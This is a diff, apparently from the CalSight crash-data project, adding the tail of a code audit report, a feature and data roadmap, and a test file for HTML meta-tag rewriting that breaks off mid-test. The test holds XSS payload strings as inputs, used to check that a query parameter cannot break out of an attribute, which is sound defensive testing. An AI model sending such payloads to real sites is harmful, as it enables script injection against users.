+**H-F10. Heatmap failures produce a blank map with no error or retry UI** —
+`MapPage.tsx:179-187,789,814`. `statewideHeatmap.error` is never rendered; the retry pill requires
+`points.length > 0`.
+
+**H-F11. Map layer toggles invisible to assistive tech** — `LayersPanel.tsx:19-33,90-95`. The
+`Toggle` used ~7 times is a bare `<button>` with no accessible name, no `role="switch"`/
+`aria-checked`; the e2e suite already works around it by navigating raw div structure.
+
+**H-F12. County multi-select lacks combobox semantics and keyboard dismissal** —
+`SearchableMultiSelect.tsx:31-39,85-118`. No `aria-expanded`/listbox roles, no Escape-close, and
+selection is a color-only icon whose ligature text "check" pollutes the accessibility tree. (The
+correct pattern exists in-repo at `ChoroplethLegend.tsx:112-165`.)
+
+**H-F13. Search bar: nested interactive buttons + inaudible keyboard highlight** —
+`UnifiedSearchBar.tsx:169-207,313-323`. Favorite-star buttons nested inside result-row buttons
+(invalid HTML); no combobox role or `aria-activedescendant`.
+
+---
+
+## Medium
+
+### Backend
+
+- **M-B1.** Unguarded `int()` in SWITRS time parsing aborts the whole load on one malformed
+  `collision_time` — `etl/switrs_api.py:97-99`.
+- **M-B2.** `POST /api/etl/run` runs the full pipeline inside a gunicorn worker thread (dies on
+  deploy/recycle; `only.split(",")` doesn't strip whitespace) — `app/routers/etl.py:131-150`.
+- **M-B3.** Manual `BEGIN`/`COMMIT` via `text()` inside an auto-begin Session desyncs SQLAlchemy
+  transaction bookkeeping — `app/routers/crashes.py:157-169`. Use `SET LOCAL` + rollback.
+- **M-B4.** `matview_age_hours` always null: naive−aware datetime subtraction raises, swallowed by
+  bare `except`; `active_jobs` computed but unused in status decision — `app/routers/pipeline_health.py:84,101,139-158`.
+- **M-B5.** `group_by=rate` silently ignores an explicit `cause` filter, returning unfiltered
+  rates presented as filtered — `app/routers/stats.py:646-673`.
+- **M-B6.** AI tools silently drop unresolvable county filters → statewide totals reported as
+  county numbers ("Los Angelos" → 11M-row statewide count cited as the county figure) —
+  `app/ai_tools.py:120-123,357-360`. `compare_counties` handles it correctly; inconsistent.
+- **M-B7.** `get_crash_rate` divides multi-year crash totals by single-year denominators → rates
+  inflated ~25× when `years=None` — `app/ai_tools.py:789-829`.
+- **M-B8.** EtlRun double-tracking with inconsistent source names inflates run history and feeds
+  `/api/freshness` phantom sources — `etl/load_crashes.py:227-234`, `load_parties_victims.py:313`.
+- **M-B9.** Silent partial success in parties/victims loader: page-fetch failure `break`s but the
+  run still records `success`, `rows_loaded` never set — `etl/load_parties_victims.py:235-271`.
+- **M-B10.** Two parallel schedulers (`etl/scheduler.py` vs `etl/pipeline.py`) and two backup
+  implementations (`etl/backup.py` vs `pipeline.run_backup`) with divergent behavior — whichever
+  prod runs, the other rots. The scheduled backup also passes the DB password on the pg_dump
+  command line (`/proc` leak) — the exact problem `backup.py:_split_db_password` exists to fix.
+- **M-B11.** Per-process in-memory state × 4 workers: rate limits are 4× advertised (admin
+  brute-force 5/min → effectively 20/min), LLM cooldowns and ask cache quartered —
+  `stats.py:174`, `admin.py:25`, `llm.py:71`, `llm_cache.py:122`.
+- **M-B12.** Timezone-representation mixing in `etl_runs` writes (aware values into naive columns)
+  makes staleness math offset-dependent on non-UTC servers — `orchestrator.py:98,149`.
+
+### Infrastructure / CI / docs
+
+- **M-I1.** Read-only API role exists on paper only: deploy writes only `DATABASE_URL`, alembic
+  succeeds on it → prod URL carries full DDL rights — `deploy.yml:69`, `app/settings.py:34-49`.
+- **M-I2.** Lighthouse job triple-softened (`continue-on-error` + `|| true` + all assertions
+  "warn") — gates nothing — `ci.yml:121,139`, `frontend/lighthouserc.json`.
+- **M-I3.** `npm run build` is not in the gating frontend CI job; a broken vite build merges green —
+  `ci.yml:53-68`.
+- **M-I4.** No `concurrency` group on CI — redundant full CodeQL+Postgres+Lighthouse stacks per push.
+- **M-I5.** `npm audit --audit-level=high` as a hard PR gate fails unrelated PRs on new upstream
+  advisories — `ci.yml:102-104`.
+- **M-I6.** "Enforce PR Dependencies" has `continue-on-error: true` on its only step — cannot
+  enforce anything — `depends-on.yml:18`.
+- **M-I7.** Image "prune keep last 5" actually prunes only dangling images; tagged rollback images
+  accumulate unbounded — `deploy.yml:118-119`.
+- **M-I8.** Four overlapping ETL scheduling mechanisms; systemd unit and cron script exec into a
+  container name (`calsight-backend`) that compose v2 doesn't create (`calsight-backend-1`) —
+  `backend/deploy/calsight-etl-scheduler.service:9`, `setup-etl-cron.sh:9`.
+- **M-I9.** `backend/.env.example` materially incomplete (missing `ETL_DATABASE_URL`, `R2_*`,
+  `LLM_FALLBACK_*`, etc.); no `frontend/.env.example` at all despite being referenced.
+- **M-I10.** README quickstart fails on a fresh clone: `docker compose up --build` aborts on the
+  hard `env_file: backend/.env` requirement — `README.md:34-46`, `docker-compose.yml:26-27`.
+- **M-I11.** Conflicting architecture docs: API host is LXC 100 or VM 101 depending on which doc
+  you read; DB is LXC 100 or VM 109 — `docs/OPERATOR_SETUP.md:8-12` vs `run-etl.yml:3-4` vs
+  `etl/backup.py:7`.
+- **M-I12.** No incident runbook: nothing explains how to interpret an ETL failure alert, rerun a
+  job, clear zombie runs, or restore from backup (restore steps live only in a docstring;
+  PRODUCTION_CHECKLIST §10 still lists "Test restore procedure" as open).
+
+### Frontend (selected — full list in the frontend section of the audit transcript)
+
+- **M-F1.** Deploy causes an unannounced full page reload mid-session (`autoUpdate` +
+  `skipWaiting`); no update prompt, no periodic `registration.update()` — `vite.config.ts:9,23-24`.
+- **M-F2.** Corrupt/legacy stored theme crashes the app in a reload loop (unsafe cast; "Reload"
+  clears the query cache but not the theme key) — `src/lib/theme/persistence.ts:19-24,69`.
+- **M-F3.** Pressing "B" (Builder-mode toggle) wipes all built charts with no confirmation;
+  localStorage copy overwritten 400ms later — `useDashboardConfig.ts:65-71`, `useDashboardKeyboard.ts:52-56`.
+- **M-F4.** Keyboard preset switching (keys 1–8) skips the drill/cross-filter reset the mouse path
+  does → single-county data labeled statewide — `StatsPage.tsx:196-208`.
+- **M-F5.** Saved dashboards load unvalidated, bypassing `isValidConfig` — `useSavedDashboards.ts:25-35`.
+- **M-F6.** `retry()` sends the failed question twice in LLM history — `useAskAi.ts:80,116-119,227-234`.
+- **M-F7.** Batched heatmap pagination stalls forever on a legitimately empty mid-sequence batch —
+  `useCrashHeatmap.ts:163-167`.
+- **M-F8.** "Hide River Crashes" toggle semantics inverted vs the `include_rivers` API param —
+  `LayersPanel.tsx:195-205` vs `useCrashHeatmap.ts:81`.
+- **M-F9.** Up to 800 SVG DOM markers (each mounting a full `<Popup>` subtree) reconciled through
+  React per map move; no `preferCanvas`; mismatch layer uncapped — `CrashDotLayer.tsx:73-163`,
+  `MapCanvas.tsx:263-279`.
+- **M-F10.** CorrelationMatrix re-renders all 841 SVG cells on every hover — `CorrelationMatrix.tsx:186,228-251`.
+- **M-F11.** Context provider values recreated every render (worst: `CustomThemeContext.tsx:136-173`).
+- **M-F12.** Layout ErrorBoundary never resets on navigation; one page error latches the fallback
+  across route changes — `Layout.tsx:49-68`, `ErrorBoundary.tsx:17-19`.
+- **M-F13.** og-image worker: concurrent `initWasm` race 500s exactly when links are shared; no
+  edge caching despite the comment claiming it (unbounded attacker-controlled WASM renders) —
+  `workers/og-image/src/index.ts:19-26,266-281`.
+- **M-F14.** Icon font not SW-cached: offline UI renders raw ligature text ("cloud_off") —
+  `index.html:39`, `vite.config.ts:30-62`.
+- **M-F15.** Opaque CARTO tile caching (`statuses: [0, 200]`) risks quota-padding eviction of the
+  precache — `vite.config.ts:32-38`.
+- **M-F16.** Chart drill-down/cross-filter is mouse-only (no `tabIndex`/key handlers on SVG rects) —
+  `SimpleBarChart.tsx:91-190`.
+- **M-F17.** StoryCanvasPanel claims `aria-modal="true"` with no focus trap (correct trap exists
+  in-repo in `AiCompanion.tsx:51-81`) — `StoryCanvasPanel.tsx:49-58`.
+- **M-F18.** LayersPanel measure/resolution/palette "radio groups" convey selection by color only —
+  `LayersPanel.tsx:150-309`.
+- **M-F19.** The Colorblind-Safe palette never reaches crash dots: `palette` prop declared but
+  never destructured — `CrashDotLayer.tsx:40`.
+- **M-F20.** leaflet.heat private-internals casts (`_canvas`/`_animateZoom`) on an unpinned
+  `^0.2.0` dep — `CrashHeatmap.tsx:90-106,213-226`.
+- **M-F21.** 933-line `labelPlacement.ts` is dead code (sole importer is its own test).
+- **M-F22.** `slotKey` contract hand-duplicated three times; drift silently renders "No data" —
+  `lib/dashboard/types.ts:101-109`, `DashboardGrid.tsx:14-22`, `StoryReader.tsx:198-268`.
+- **M-F23.** Chart transforms (log/cumulative/moving-average) fully implemented in the data
+  pipeline but hardcoded unreachable in the UI (`SUPPORTS_* = new Set([])`) — `ChartConfigPanel.tsx:55-58`.
+- **M-F24.** Systemic: API JSON bulk-cast, never validated — a backend field rename yields silent
+  `NaN` charts — e.g. `useDashboardData.ts:56-146`, `useCorrelationData.ts:135,140`.
+- **M-F25.** Test coverage inverts the risk profile: MapCanvas test mocks everything down to
+  "renders without crashing"; MapPage, StatsPage, filter wizard, export libs, workbox routing have
+  zero tests while trivial pure functions are tested exhaustively.
+
+### Security (medium)
+
+- **M-S1.** `run-etl.yml` lacks a top-level `permissions:` block (only workflow of four without) —
+  broad default `GITHUB_TOKEN` on the self-hosted runner.
+- **M-S2.** nginx image ships no security headers and runs as root — mitigated because prod is
+  Cloudflare Pages; document image as dev-only or fix — `frontend/nginx.conf:1-18`, `frontend/Dockerfile:16-19`.
+
+---
+
+## Low (abridged — highest-value items)
+
+- **L1.** `jobs.py:19` hardcodes `--end 2026`; January 2027 silently out of range. `RESOURCE_IDS`
+  maps need annual manual edits.
+- **L2.** `etl/incremental.py` entirely dead code, and contains an f-string-interpolated SQL
+  pattern waiting to be wired up — delete or finish it.
+- **L3.** Rate limiting keyed on `get_remote_address` behind Cloudflare Tunnel — all traffic may
+  share one bucket; confirm forwarded-IP handling — `app/main.py:130`.
+- **L4.** Middleware ordering: NullByte/SecurityHeaders added after CORS, so their 400s lack CORS
+  headers — `app/main.py:123-124`.
+- **L5.** `llm.py:286` catch-all `except (..., Exception)` cools providers down for programming
+  errors, masking bugs as "provider unavailable".
+- **L6.** Unpinned base images (`nginx:alpine`, `python:3.12-slim`, `node:20-alpine`) and unpinned
+  CI tooling (`bandit`, `@lhci/cli`) — supply-chain drift.
+- **L7.** `docker-compose.prod.yml` healthcheck lacks `start_period`; deploy gives backend only
+  ~30s to come up — slow cold start fails deploy spuriously, then hits the broken rollback (H-I2).
+- **L8.** Doc rot: `docs/db-schema.md` describes 4 MVs (code has 8) and cites files that don't
+  exist; `db/postgresql.conf` says PG 16 vs 17 elsewhere and is mounted by nothing; README says
+  22 ETL jobs, `run_all_etl.sh` says 20, `etl/jobs.py` registers 25.
+- **L9.** Orphaned files: `ca-counties-old.geojson` (418 KB, zero refs), root `package-lock.json`
+  stub, `docs/PR_DESCRIPTION.md`, unreferenced `frontend/Dockerfile`+`nginx.conf`.
+- **L10.** `heatmap.py:166-186` COUNT and page SELECT in separate statements with no snapshot —
+  rows shift between batches during ETL (dupes/gaps).
+- **L11.** Frontend: uncleaned timers (`AskAiPage.tsx:90-117`, `CrashDotLayer.tsx:88-103`),
+  unflushed debounced dashboard save (`useDashboardConfig.ts:57-63`), silent PNG-export failures
+  (`ChartCard.tsx:329-332`), no `res.ok` check in `useCountyGeoJson.ts:9-10`, entry bundle pulls
+  react-markdown for every visitor (`App.tsx:20`), `navigateFallbackDenylist` blocks the SPA's own
+  `/admin/etl` route offline (`vite.config.ts:29`), arrow-pan ignores reduced-motion
+  (`useMapKeyboard.ts:82-118`), theme `customVars` injected into stylesheet unsanitized
+  (`cssInjector.ts:236-239`).
+- **L12.** Alembic migration `e6f7a8b9c0d1` has a silent no-op `downgrade()` (only 1 of 50 —
+  deserves a comment).
+- **L13.** dependabot.yml misses `workers/og-image` and `frontend/functions` ecosystems; no
+  update grouping.
+
+---
+
+## What's done notably well
+
+- **No SQL injection surface, by design.** The NLQ "Ask AI" feature does not let the LLM generate
+  SQL: it uses function-calling into a fixed registry of 13 typed tools (`backend/app/ai_tools.py`)
+  built on the ORM with whitelisted `group_by`, capped results. All request-facing routers use ORM
+  predicates; `text()` usage is confined to non-request ETL with bound params.
+- **AI prompt-injection → XSS is closed**: `react-markdown` with no `rehype-raw`, zero
+  `dangerouslySetInnerHTML` in the codebase.
+- **Least-privilege DB design** (read-only API role, separate ETL role) — though see M-I1: it must
+  actually be wired up in prod.
+- **Strict, consistent input validation** (`app/filters.py`): slug whitelists, uniform 422
+  envelope, `require_min_filter` anti-scraping guard.
+- **Materialized-view lifecycle is textbook**: `WITH NO DATA` + `relispopulated` health signaling
+  + `REFRESH CONCURRENTLY` with unique indexes + a single source-of-truth view list shared between
+  health and ETL.
+- **Migration hygiene**: 50 migrations, single linear head, 49/50 real downgrades,
+  `CREATE INDEX CONCURRENTLY` on the 11M-row table, index coverage matching documented filters.
+- **CI/CD security posture**: every action SHA-pinned, least-privilege `permissions:` blocks
+  (except run-etl.yml), `persist-credentials: false`, correctly-guarded `pull_request_target`.
+- **Frontend architecture**: URL-as-single-source-of-truth with stable Set identities, disciplined
+  imperative-Leaflet cleanup, strict TS with essentially zero `any` across 37k lines, lazy-loaded
+  routes, textbook AbortController/timeout/429-backoff in `useAskAi`, invariant-level tests
+  (CSP hash verification, free-tier-never-hits-network).
+- **Constant-time auth comparisons** (`hmac.compare_digest`) and rate-limited verify endpoints.
+- **Clean dependency posture**: 0 npm vulnerabilities, 0 known Python CVEs, lockfiles present,
+  only 7 TODOs across ~70k lines.
+
+---
+
+## Recommended priority order
+
+1. **This week — data integrity & recovery (silent failures):**
+   C1 (re-ingest current year daily — pass `--force` for current+prev year or wire up
+   `incremental.py`), C4 (install `postgresql-client-17`, wire `upload_to_r2`, then run one real
+   restore test), H-B2 (wire the validation suite or delete the dead framework and its fabricated
+   `passed` status).
+2. **This week — CI-runner security:** H-S1 (env-var + regex-validate `inputs.job`),
+   M-S1 (`permissions: contents: read`), H-I5 (shred `backend/.env` post-run).
+3. **Next — deploy safety:** C3 (gate deploy on CI via `workflow_run`), H-I2 (fix rollback
+   selection), H-I1 (queue instead of cancel), H-I3 (stop truncating .env or write all keys),
+   H-I4 (redeploy the pipeline container), M-I1 (actually use the read-only role in prod +
+   set `ETL_DATABASE_URL`) together with H-B1 (feedback write path).
+4. **Next — top user-facing bugs:** C2 (ask timeout session leak), C5 (cap/index the heatmap
+   point path), H-F1 (drag indices), H-F2 (send the ETL key header), H-F3 (fix SW regexes for
+   cross-origin API), H-F5/H-F6 (ask-AI state), M-F3 (Builder-mode data wipe needs confirmation).
+5. **Then — the medium backlog**, starting with the AI-answer-correctness items (M-B5, M-B6,
+   M-B7) since they undermine the product's core trust proposition, and the a11y cluster
+   (H-F11–13, M-F16–18) which contradicts the README's accessibility claim.

--- a/docs/feature-data-roadmap.md
+++ b/docs/feature-data-roadmap.md
@@ -1,0 +1,231 @@
+# CalSight — Feature & Data Roadmap ("be a beast")
+
+**Created:** 2026-07-02. Purpose: a researched, prioritized roadmap of new **data points** and
+**product features** to push CalSight from "great civic crash explorer" to best-in-class,
+grounded in what leading road-safety tools do.
+
+**Scope (from the owner):** general-purpose audience (public/journalism + Vision-Zero/advocacy +
+personal safety), **California-deep** (not multi-state), emphasizing all four axes — analytical
+depth, new data points, killer UX, and AI/interactivity.
+
+> **Provenance & verification note.** This roadmap was produced by a multi-source research pass
+> (11 primary sources cited inline). The automated adversarial-verification stage was interrupted
+> by a usage limit, so the source claims below were **hand-vetted against domain knowledge**
+> rather than machine-verified — they're consistent with established highway-safety practice
+> (FHWA Highway Safety Manual, Vision Zero programs). Treat feasibility/format details for any
+> new dataset as **"confirm the actual download format before building"** — the same rule that
+> killed the DUI effort (see `data-source-backlog.md`).
+
+---
+
+## 0. The strategic insight (read this first)
+
+**UC Berkeley's TIMS/SafeTREC already offers free, geocoded SWITRS mapping and point-and-click
+tools, and has for 20+ years** [safetrec.berkeley.edu]. It ships things CalSight doesn't: a DUI
+Crash Summary, Weekly Crash Trends, a Safe-Routes-to-School map, a Motorcycle Crash Map, ATP
+(Active Transportation Program) maps, and Safety-Performance-Measure target-setting.
+
+So **"free SWITRS on a map" is not a moat.** CalSight's differentiation has to come from the
+things TIMS *doesn't* do well: **exposure-normalized risk, statistical rigor (not raw counts),
+route/segment-level risk, natural-language AI, and modern UX/embeds.** Every item below is ranked
+with that lens — impact-per-effort, weighted toward what makes CalSight *distinct*, not just
+what's missing.
+
+---
+
+## 1. New California data points (beyond the vetted VMT / EV / transit backlog)
+
+Ranked by analytical unlock × feasibility. Formats flagged **[confirm]** still need a
+download-format check before building.
+
+### D1. Hospital / EMS injury data — the "police undercount" corrector ⭐ highest-novelty
+- **Why it matters:** police crash reports capture only **44–75% of pedestrian injury crashes**
+  and as little as **7–46% of bicyclist injury crashes** when validated against hospital records
+  [escholarship.org/uc/item/0jq5h6f5]. CalSight is SWITRS-based, so it **systematically
+  undercounts exactly the vulnerable-road-user harm it most wants to surface.** A hospital/EMS
+  layer (or even just an honest "police data undercounts VRU injuries by X%" adjustment banner)
+  is a genuine analytical differentiator no free CA tool foregrounds.
+- **Candidate sources:** CA **HCAI** (formerly OSHPD) ED-visit & inpatient-discharge data
+  (external-cause/transport injury codes); **EMSA CEMSIS** (California EMS Information System)
+  [emsa.ca.gov/cemsis]. County-keyable.
+- **Feasibility:** MEDIUM–LOW. High value, but access is the risk — HCAI patient-level data is
+  often restricted/aggregated, and **crash-victim re-identification is a real hazard** (see §4).
+  **[confirm]** what's available as public **county-aggregate** CSV before committing. Start with
+  aggregate injury *counts by county/mode/year* (safe, public) rather than record-level.
+
+### D2. Roadway inventory & facility classification — unlocks the flagship analytics
+- **Why it matters:** the statistically-correct hotspot method (SPF + Empirical Bayes, §3/A1)
+  needs only **crash counts + AADT exposure + facility-type classification** — no full asset
+  inventory [highways.dot.gov HSM]. CalSight already has crashes and state-highway AADT; adding
+  **functional class / lane count / segment geometry** turns on network screening.
+- **Candidate sources:** Caltrans **GIS open-data / HPMS** (ArcGIS Hub — `gisdata-caltrans.opendata.arcgis.com`),
+  the Caltrans Road Data / Highway Performance Monitoring System layers. Segment-level (GIS).
+- **Feasibility:** MEDIUM. Caltrans publishes GIS layers (good), but coverage is **state highways**;
+  local roads are the gap (that's why §3/A2's AADT-imputation matters). **[confirm]** the GIS
+  attribute tables carry functional class + AADT per segment.
+
+### D3. Safety intervention / countermeasure layers — enables before/after
+- **Why it matters:** NYC's Vision Zero View overlays **speed humps, slow zones, street-improvement
+  projects, and the 25 mph limit** directly on the crash map so users can relate crashes to
+  treatments [vzv.nyc]. This is a whole feature class CalSight lacks and is the backbone of
+  credible "did it work?" analysis for advocates and journalists.
+- **Candidate sources:** Caltrans **SHOPP** / safety project lists, local Vision Zero project
+  layers (SF, LA, Oakland, San Diego open-data portals), speed-limit-change records.
+- **Feasibility:** MEDIUM (state) / fragmented (local). Start with Caltrans + the 3–4 biggest city
+  open-data portals. **[confirm]** machine-readable project geometries + dates.
+
+### D4. Active-transportation exposure (bike/ped counts) — the VRU denominator
+- **Why it matters:** you can't compute a *rate* for pedestrians/cyclists without exposure. CA's
+  **AT Count / bike-ped count** program exists (`data.ca.gov/dataset/at-count-dataset`).
+- **Feasibility:** MEDIUM, sparse coverage. Good for the biggest metros; **[confirm]** county
+  coverage. Pairs with D1 to make VRU analytics honest.
+
+### D5. TIMS geocoded coordinates as an upstream geocoding benchmark
+- **Why it matters:** SafeTREC has geocoded **~95% of CA fatal & severe-injury crashes**, supplying
+  `POINT_X/POINT_Y` alongside the raw report lat/long [safetrec.berkeley.edu]. If CalSight's dot
+  placement relies on raw SWITRS coordinates (which are noisier), TIMS geocoding quality is a
+  **benchmark to measure against** and possibly a source to reconcile with.
+- **Feasibility:** validation/quality play, not a new dataset per se. Low effort, quiet quality win.
+
+> Also surfaced and worth a look: the CA DPH **"Road Traffic Injuries"** dataset on data.ca.gov
+> (already-curated county injury indicators) and the **OTS data-sources** index (crash rankings by
+> city/county OTS already publishes — a benchmark and possible import).
+
+---
+
+## 2. Features leading tools have that CalSight lacks — quick wins
+
+These are proven by the benchmark tools and cheap to build on data CalSight already has (SWITRS/CCRS
+points). High impact-per-effort.
+
+- **F1. Intersection & corridor deep-dive / ranking.** Portland's High Crash Network is literally
+  "the 30 streets and 30 intersections with the most crashes," ranked by **count, rate, and total
+  collision cost** over a fixed multi-year window [portland.gov]. NYC rolls crashes up **per
+  intersection, by month/year and by mode** (ped/bike/vehicle) [vzv.nyc]. CalSight has county
+  choropleths and dots but **no intersection object** — this is the single most-requested civic
+  crash feature and is computable from geocoded points.
+- **F2. Mode-specific views (ped / bike / motorcycle).** Dedicated pedestrian, bicycle, and
+  motorcycle layers/summaries — TIMS ships a Motorcycle Crash Map and SRTS map. Serves consumers
+  ("is my bike commute dangerous") and advocates.
+- **F3. DUI view + Weekly/seasonal trend view.** TIMS ships both as standard. CalSight has the data;
+  these are chart/preset additions.
+- **F4. Embeddable widgets + auto-generated reports.** A per-county/per-city "safety report card"
+  (PDF/embeddable card) is a distribution and journalism multiplier — every local news story about
+  a crash could embed CalSight. Low data risk, high reach.
+- **F5. Countermeasure overlay** (depends on D3) — even a read-only "recent safety projects" layer.
+
+---
+
+## 3. Flagship analytical bets (the moat)
+
+This is where CalSight beats TIMS. All are grounded in the highway-safety literature.
+
+### A1. Statistically-rigorous hotspot detection (SPF + Empirical Bayes) ⭐ flagship
+- **The problem with the obvious approach:** ranking locations by raw crash count — or even by
+  crash *rate* — is **wrong**. It's fooled by regression-to-the-mean (a bad-luck year looks like a
+  dangerous site). The FHWA-standard fix is **Safety Performance Functions + the Empirical Bayes
+  method**, which "identifies high-priority locations more accurately than ranking by raw
+  frequencies or rates" [highways.dot.gov HSM].
+- **Why CalSight can do it:** network-screening SPFs need **only crash counts + AADT + facility
+  class** — data CalSight has or can add (D2). EB shrinkage *also* fixes CalSight's **small-county
+  instability** problem (5 tiny counties swing wildly) for free.
+- **Effort:** MEDIUM-HIGH (the flagship). Ship it as "statistically-adjusted risk ranking," a
+  claim no free CA tool makes.
+
+### A2. Exposure normalization done *honestly* (don't just divide by VMT)
+- **The trap:** crash counts scale **sublinearly** with traffic — estimated exposure exponents of
+  **0.49–0.70 (all < 1)**, the "safety in numbers" effect [arxiv 2605.27889]. So **naive
+  per-VMT/per-AADT rates overstate risk on high-volume roads and understate it on low-volume
+  roads.** The vetted VMT backlog item is right to pursue, but the normalization must use the
+  sublinear model (or an SPF), not a straight ratio.
+- **Bonus method:** a **Bayesian hierarchical model can impute missing AADT** on local roads
+  (where Caltrans has none) and produce per-segment rates *with uncertainty* at statewide scale
+  (demonstrated on 408k segments / 2.9M crashes) [arxiv 2605.27889]. This is the principled answer
+  to "AADT only covers state highways."
+
+### A3. Network-constrained hotspot / segment risk
+- Crashes live on a **linear road network**, so hotspot detection should use **network-constrained
+  KDE** (kernel density along the graph), not planar 2D heatmaps [arxiv 1911.07827]. The
+  open-source, peer-reviewed **DRHotNet** R package finds micro-segments where a *specific* crash
+  type (e.g., pedestrian) is over-represented — a **type-specific hotspot** feature distinct from
+  CalSight's existing raw-count heatmap.
+- **Corridor scoring template:** Boston MPO's HIN uses a **1-mile sliding window in half-mile
+  shifts**, aggregating **severity- and VRU-weighted (EPDO cost) scores** [ctps.org]. Result: the
+  HIN is **~7% of road miles but ~65% of killed/severe-injury crashes** — mirrored in Portland
+  (**8% of streets, 67% of deaths**) [portland.gov]. That concentration is the *entire argument*
+  for why segment-level beats county choropleths.
+
+### A4. Route / segment risk score (consumer-facing)
+- "How dangerous is my commute" = fuse historical crashes with exposure/behavior layers (a
+  fuzzy-logic or model-based combination) rather than crash counts alone [arxiv 2209.05604].
+  **Caveat to ship with it:** history-only risk omits driver behavior and real-time conditions —
+  say so in the UI [arxiv 2209.05604].
+
+### A5. AI/interactivity built on the above
+- Once hotspots/anomalies are computed: **auto-narrate** the top movers ("Intersection X entered
+  the high-injury network this year, +40% ped injuries"), **anomaly detection** on trends, and
+  extend the NLQ tool registry with hotspot/route/intersection tools. This is where CalSight's
+  existing AI stack compounds the new analytics.
+
+---
+
+## 4. Statistical & ethical pitfalls (build these in, not after)
+
+- **Re-identification of crash victims is real and severe.** Crash details *outside* HIPAA's 18
+  identifiers (year, location, circumstances) can re-identify people in "de-identified" hospital
+  data — relative risk **537× vs. general population**, rising to **25%** if the victim was
+  hospitalized and **66.7%** if hospitalized with permanent injury [PMC6371259]. **The severe/fatal
+  crashes CalSight most wants to surface are the most re-identifiable.** Mitigation: for
+  fatal/severe records, avoid exposing precise location **+** exact date **+** victim detail
+  *together*; consider spatial/temporal jitter or aggregation at the most sensitive tiers.
+- **Police undercount (D1):** headline VRU numbers should carry the "police data captures only
+  44–75% of ped / 7–46% of bike injuries" caveat, or CalSight overstates safety.
+- **Small-county instability:** EB shrinkage (A1) is the principled fix; until then keep the
+  min-denominator guard and methodology note.
+- **Correlation ≠ causation:** the matrix and any new "risk" framing must stay honest — the
+  sublinear-exposure finding (A2) is a concrete example of how a naive rate misleads.
+
+---
+
+## 5. Prioritized roadmap (impact-per-effort tiers)
+
+**Tier 1 — Quick wins (weeks, data already in hand):**
+1. **F1 Intersection/corridor deep-dive + ranking** (Portland/NYC template) — biggest
+   feature gap, computable from geocoded SWITRS points.
+2. **F3 DUI + weekly/seasonal trend presets** — cheap, matches TIMS baseline.
+3. **F2 Mode-specific (ped/bike/motorcycle) views** + the **D1 undercount caveat banner**.
+4. **F4 Embeddable per-county "safety report card"** — distribution/journalism multiplier.
+
+**Tier 2 — Flagship analytics (the moat):**
+5. **A3 Network-constrained + severity/VRU-weighted hotspot/HIN** — CalSight's "7% of roads, 65%
+   of deaths" headline.
+6. **A1 SPF + Empirical Bayes risk ranking** — rigorous, also fixes small-county instability.
+7. **A2 Honest exposure normalization** (sublinear model; ties in the vetted VMT item correctly).
+
+**Tier 3 — Data expansions (unlock more of the above):**
+8. **D2 Caltrans roadway/facility GIS** (enables A1) → **D3 countermeasure layers** (before/after)
+   → **D4 bike/ped exposure** → **D1 hospital/EMS aggregates** (highest-novelty, gated on access).
+
+**Tier 4 — Flagship consumer + AI:**
+9. **A4 Route-risk score** and **A5 AI auto-narratives / anomaly detection** on top of Tier 2.
+
+**Sequencing logic:** Tier 1 closes the visible feature gap vs. TIMS fast; Tier 2 builds the
+statistical moat TIMS lacks; Tier 3 feeds Tier 2; Tier 4 is the consumer/AI flourish that ties
+CalSight's existing AI stack to the new analytics.
+
+---
+
+## Sources
+- UC Berkeley SafeTREC / TIMS — tools & geocoding: https://safetrec.berkeley.edu/tools/transportation-injury-mapping-system-tims
+- Boston MPO High-Injury Network methodology: https://www.ctps.org/data/html/plans/Vision-Zero/Vision_Zero_Appendices_Files/VisionZeroAppCHigh-InjuryNetworkMethodology.html
+- FHWA Highway Safety Manual — SPF/Empirical Bayes network screening: https://highways.dot.gov/safety/learn-safety/highway-safety-manual-case-study-4-development-safety-performance-functions
+- Portland Vision Zero High Crash Network: https://www.portland.gov/transportation/vision-zero/high-crash-network-streets-and-intersections
+- NYC Vision Zero View: https://vzv.nyc/
+- DRHotNet (network-constrained differential hotspots): https://arxiv.org/pdf/1911.07827
+- Bayesian hierarchical crash-rate w/ AADT imputation & sublinear exposure: https://arxiv.org/pdf/2605.27889
+- Fuzzy-logic segment risk scoring: https://arxiv.org/pdf/2209.05604
+- Crash-victim re-identification risk: https://pmc.ncbi.nlm.nih.gov/articles/PMC6371259/
+- Pedestrian/bicyclist police-report underreporting: https://escholarship.org/uc/item/0jq5h6f5
+- Candidate CA data portals: EMSA CEMSIS (emsa.ca.gov/cemsis), Caltrans GIS open-data
+  (gisdata-caltrans.opendata.arcgis.com), CA DPH Road Traffic Injuries & AT Count (data.ca.gov),
+  OTS data sources (ots.ca.gov/data-sources).

--- a/frontend/functions/_middleware.test.ts
+++ b/frontend/functions/_middleware.test.ts
@@ -1,0 +1,94 @@
+import { describe, it, expect } from "vitest";
+import { escapeHtmlAttr, buildContext, rewriteHtml } from "./_middleware";
+
+const SAMPLE_HTML = `<!doctype html>
+<html>
+  <head>
+    <title>CalSight</title>
+    <meta name="description" content="placeholder" />
+    <meta property="og:title" content="placeholder" />
+    <meta property="og:description" content="placeholder" />
+    <meta property="og:image" content="placeholder" />
+    <meta property="og:type" content="placeholder" />
+    <meta name="twitter:card" content="placeholder" />
+    <meta name="twitter:title" content="placeholder" />
+    <meta name="twitter:description" content="placeholder" />
+    <meta name="twitter:image" content="placeholder" />
+  </head>
+  <body></body>
+</html>`;
+
+describe("escapeHtmlAttr", () => {
+  it("escapes all HTML-attribute-significant characters", () => {
+    expect(escapeHtmlAttr(`&<>"'`)).toBe("&amp;&lt;&gt;&quot;&#39;");
+  });
+
+  it("escapes the ampersand first so entities are not double-mangled", () => {
+    expect(escapeHtmlAttr("&lt;")).toBe("&amp;lt;");
+  });
+
+  it("leaves benign text untouched", () => {
+    expect(escapeHtmlAttr("Los Angeles, Kern")).toBe("Los Angeles, Kern");
+  });
+});
+
+describe("rewriteHtml injection hardening", () => {
+  it("does not let a counties query param break out of the meta attribute", () => {
+    const payload = `"><script>alert(1)</script>`;
+    const url = new URL(`https://calsight.org/stats?counties=${encodeURIComponent(payload)}`);
+    const ctx = buildContext(url);
+    const out = rewriteHtml(SAMPLE_HTML, ctx);
+
+    expect(out).not.toContain("<script>");
+    expect(out).toContain("&lt;script&gt;");
+    expect(out).toContain("&quot;&gt;");
+  });
+
+  it("does not let an unescaped quote terminate the description attribute", () => {
+    const url = new URL(
+      `https://calsight.org/stats?counties=${encodeURIComponent(`x" onmouseover="alert(1)`)}`,
+    );
